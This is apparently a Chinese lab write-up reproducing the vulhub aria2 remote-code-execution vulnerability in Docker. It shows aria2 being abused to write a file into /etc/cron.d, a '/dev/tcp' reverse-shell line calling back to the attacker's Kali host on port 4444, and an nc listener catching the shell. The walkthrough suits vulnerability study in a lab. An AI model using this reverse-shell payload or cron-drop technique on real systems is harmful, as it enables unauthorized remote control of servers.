启动docker
systemctl start docker获取vulhub
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git进入对应目录
cd vulhub/aria2/rce/启动容器
docker-compose up -d查看容器
docker ps这里kali的ip192.138.164.134 centos的ip192.168.42.133 打开http://binux.github.io/yaaw/demo/ 配置aria2 填入靶机ip 在服务器生成文件 注意,这个文件要在linux环境下生成,因为在linux和windows下的换行符不同 shell
#! /bin/sh /bin/sh -i >& /dev/tcp/192.168.42.134/4444 0>&1写入一个crond任务来反弹shell
设置下载链接 在kali监听
nc -lvvp 4444等了一会发现kali并没有监听到shell 所以进入docker容器检查
docker exec -it 7f /bin/bash cd /etc/cron.d chmod 777 shell ./shell确实已经下载,执行一下 看样子在docker环境下是有很多限制的,首先是权限,直接是无法执行的, 成功反弹shell
https://github.com/vulhub/vulhub/blob/master/aria2/rce/README.zh-cn.md
